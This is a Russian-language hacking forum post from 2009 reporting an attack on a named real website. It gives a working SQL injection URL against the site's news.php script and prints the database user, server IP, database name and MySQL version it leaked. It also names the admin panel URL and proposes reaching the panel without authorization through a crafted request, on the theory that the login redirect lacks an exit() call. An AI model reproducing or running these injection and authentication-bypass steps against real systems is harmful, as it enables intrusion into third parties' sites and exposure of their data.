02.06.2009, 17:17
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
С нами:
8953743
Репутация:
59
|
|
Код:
http://www.goldcoastoceanfest.co.uk/news.php?id=-1+union+select+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+
Код:
web27-gc@79.170.40.171 : web27-gc : 5.0.77-community
паролей в бд нету
админка:
http://www.goldcoastoceanfest.co.uk/admin
В админке походу пасс прописан в самом скрипте, и почемуто мне кажится что она не надёжна...
так как при неправильном вводе пароля меня перекидывает на скрипт login.php с помощью header() и чутьё мне подсказывает что полле него не указан exit() или die()
таким образом мы можем послать составленый с помощю инеткряка GET или POST запрос дабы попасть в админку без авторизации...
Последний раз редактировалось bug1z; 02.06.2009 в 17:20..
|
|
|